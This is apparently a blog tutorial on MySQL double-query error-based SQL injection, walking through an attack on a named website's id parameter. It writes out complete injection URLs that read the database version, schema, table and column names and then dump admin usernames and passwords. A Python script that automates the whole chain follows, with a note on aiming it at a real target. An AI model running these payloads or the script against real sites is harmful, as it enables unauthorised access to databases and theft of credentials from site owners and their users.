
Tuesday, 01 July 2014

Double Query Based Injection

Assalamualaikum
Back again, this time a tutorial on double query injection :D

Double query (error-based) injection abuses a MySQL quirk: floor(rand(0)*2) is evaluated more than once while GROUP BY fills its temporary table, so a key that was just inserted is met again and MySQL aborts with "Duplicate entry ... for key 'group_key'". Whatever we concat() into that key comes back inside the error message, so we can read data out of a page that never displays query results, as long as it prints database errors.

target name censored :D
http://janda.com/pro.php?id=8

add a single quote (') to the id parameter and look at the error that comes back

then we get the version with this request
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),+0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

version: 5.0.96-log

now find the databases
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

result: information_schema
to get the next database change the inner +LIMIT+0,1 (the one on information_schema.schemata) to LIMIT 1,1, LIMIT 2,1 and so on

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+1,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
database: challanich




now find the tables of the challanich database (0x6368616c6c616e696368 is "challanich" as a MySQL hex literal, so no quotes are needed in the payload)

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=0x6368616c6c616e696368+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1




lucky, the first table already has "admin" in its name :D
table: ch_admin
as above, change LIMIT 0,1 to LIMIT 1,1, 2,1 ... to see the other tables

okay, next we list the columns of the ch_admin table (0x63685f61646d696e is "ch_admin" in hex)

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1




the column name is the part between ~' and '~ in the "Duplicate entry" error

now we change the LIMIT again

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1


janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+2,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

note that only the inner LIMIT (on information_schema.columns) selects which column comes back; the +limit+0,1 on the outer "from information_schema.tables" wrapper just collapses that wrapper to one row, so changing it does not move to the next column




janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+3,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1



so the columns that matter are: user + password

now dump them (0x3a is ":" so the two values come back separated by a colon)
janda/pro.php?id=8+and+(select+1+from(select+count(*),concat((select+concat(user,0x3a,password,0x3a)+from+ch_admin+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
the user:password pair is the part between ~' and '~ in the error; change limit 0,1 to 1,1, 2,1 ... for the other rows
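The whole chain above (version, databases, tables, columns, rows) automated in Python, as an added example that is not part of the original post. It talks to a constructed stand-in for the vulnerable page instead of a real server: the target URL, the second table ch_news, the column list and the row contents are assumptions, and the payload uses the shorter concat((subquery),floor(rand(0)*2)) form rather than the extra "select ... from information_schema.tables limit 0,1" wrapper used in the post, which gives the same result. When the subquery runs past the last row it returns NULL, the group key is NULL for every row, no duplicate is raised and the page renders normally; that is how the enumeration knows it is finished.

```python
import re
from urllib.parse import unquote_plus

# ---------- client side: build the double-query payload and read the value back ----------

def hexlit(s):
    """MySQL hex literal for a string: 'ch_admin' -> 0x63685f61646d696e (no quotes needed)."""
    return "0x" + s.encode().hex()

def inner_query(kind, offset=0, schema=None, table=None, cols=()):
    """Scalar subquery returning one catalogue entry (or one row) per LIMIT offset."""
    if kind == "version":
        return "version()"
    if kind == "schemas":
        return f"select schema_name from information_schema.schemata limit {offset},1"
    if kind == "tables":
        return (f"select table_name from information_schema.tables "
                f"where table_schema={hexlit(schema)} limit {offset},1")
    if kind == "columns":
        return (f"select column_name from information_schema.columns "
                f"where table_schema={hexlit(schema)} and table_name={hexlit(table)} "
                f"limit {offset},1")
    if kind == "rows":  # concat(col,0x3a,col,...) so several columns come back in one error
        return f"select concat({',0x3a,'.join(cols)}) from {table} limit {offset},1"
    raise ValueError(kind)

def double_query(inner):
    """rand(0)/group by wrapper from the post; ~'...'~ (0x7e,0x27) marks the value in the error."""
    return ("and(select 1 from(select count(*),concat(0x7e,0x27,cast((" + inner
            + ") as char),0x27,0x7e,floor(rand(0)*2))x from information_schema.tables "
            "group by x)a) and 1=1")

def url_for(base, inner):
    return base + "+" + double_query(inner).replace(" ", "+")

MARK = re.compile(r"~'(.*?)'~")

def extract(response):
    """Value out of "Duplicate entry '~'value'~1' for key 'group_key'", or None if no error."""
    m = MARK.search(response)
    return m.group(1) if m else None

def enumerate_all(send, base, kind, **where):
    """Walk LIMIT 0,1 / 1,1 / 2,1 ... until the subquery yields NULL (no error, plain page)."""
    found, offset = [], 0
    while True:
        value = extract(send(url_for(base, inner_query(kind, offset, **where))))
        if value is None:
            return found
        found.append(value)
        offset += 1

def loot(send, base, schema, table, cols):
    """The chain from the post: version -> databases -> tables -> columns -> rows."""
    return {
        "version": extract(send(url_for(base, inner_query("version")))),
        "schemas": enumerate_all(send, base, "schemas"),
        "tables": enumerate_all(send, base, "tables", schema=schema),
        "columns": enumerate_all(send, base, "columns", schema=schema, table=table),
        "rows": enumerate_all(send, base, "rows", table=table, cols=cols),
    }

# ---------- constructed stand-in for the vulnerable page (assumption: no real server) ----------
FAKE = {  # invented catalogue: ch_news, the column list and the admin row are made up
    "version": "5.0.96-log",
    "schemata": ["information_schema", "challanich"],
    "tables": {"challanich": ["ch_admin", "ch_news"]},
    "columns": {"ch_admin": ["id", "user", "password", "email"]},
    "rows": {"ch_admin": [{"user": "admin", "password": "21232f297a57a5a743894a0e4a801fc3"}]},
}

def unhex(lit):
    return bytes.fromhex(lit[2:]).decode()

def fake_target(url):
    """Behave like the MySQL-backed page: duplicate-key error when the subquery returns a row."""
    inner = re.search(r"cast\(\((.*?)\) as char\)", unquote_plus(url)).group(1)
    value = None
    if inner == "version()":
        value = FAKE["version"]
    else:
        offset = int(re.search(r"limit (\d+),1$", inner).group(1))
        if "information_schema.schemata" in inner:
            rows = FAKE["schemata"]
        elif "information_schema.tables" in inner:
            rows = FAKE["tables"][unhex(re.search(r"table_schema=(0x[0-9a-f]+)", inner).group(1))]
        elif "information_schema.columns" in inner:
            rows = FAKE["columns"][unhex(re.search(r"table_name=(0x[0-9a-f]+)", inner).group(1))]
        else:  # select concat(col,0x3a,col) from <table> limit n,1
            table = re.search(r"from (\w+) limit", inner).group(1)
            cols = re.search(r"concat\((.*?)\)", inner).group(1).split(",0x3a,")
            rows = [":".join(r[c] for c in cols) for r in FAKE["rows"][table]]
        if offset < len(rows):
            value = rows[offset]
    if value is None:  # NULL key: nothing duplicated in group_key, the page renders normally
        return "<html>product 8</html>"
    return f"Duplicate entry '~'{value}'~1' for key 'group_key'"

if __name__ == "__main__":
    print(loot(fake_target, "http://janda.com/pro.php?id=8", "challanich", "ch_admin", ("user", "password")))
```

Against a real target, replace fake_target with a function that performs the HTTP GET and returns the response body; everything else stays the same, and url_for() reproduces the hex literals seen in the post (hexlit("challanich") is 0x6368616c6c616e696368).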



okay, that's all, thank you
hope it is useful :D